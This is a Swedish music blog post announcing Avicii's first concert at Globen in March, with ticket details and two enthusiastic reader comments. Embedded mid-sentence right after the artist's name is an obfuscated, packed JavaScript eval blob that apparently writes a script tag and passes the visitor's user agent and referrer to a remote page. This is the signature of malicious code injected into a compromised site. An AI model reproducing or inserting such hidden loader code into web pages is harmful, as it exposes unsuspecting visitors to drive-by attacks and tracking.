Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Avicii till Globen!

Avicii till Globen!
Filip Urde
  • On 31 oktober, 2011
  • http://www.revue.se/filip-urde

Avicii, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kdeeb|var|u0026u|referrer|ysbrb||js|php’.split(’|’),0,{}))
eller Tim Bergling som han heter egentligen, är utan tvivel en av de mest framstående houseartisterna de senaste åren. Låtar som ”Seek Bromance”, ”Fade into Darkness”, ”Drowning” och nu senast ”Levels” är det nog ingen som lyckats undgå om man inte bott i en jordhåla.

Avicii är idag en av de mest populära artisterna inom house och allt han rör blir mer eller mindre till guld.  Han kommer nu bli ännu mer historisk med en kommande spelning i Globen, arenan som kanske är den mest klassiska i Sverige och som ingen svensk dj någonsin gästat.

Det är knappt fyra månader kvar och det kommer bli en helt fantastisk housetillställning, det är jag övertygad om. Närmast vi fick ta del av honom på riktigt var under den episka dagen på Stockholm Stadion och Summerburst tidigare i år (vilket vi skrev om här).

Vi väntar oss inget mindre än succé! 

Avicii spelar på Ericsson Globe lördagen den tredje mars. Biljetterna kostar från 390 kronor och släpps på ticnet.se den sjunde november. Besök avicii.spglive.se för mer information.

Comments

  1. Jacob Grönberg

    Go Avicii!!!!! 

  2. C Dahl

    LÄÄÄÄÄÄNGTAR!!!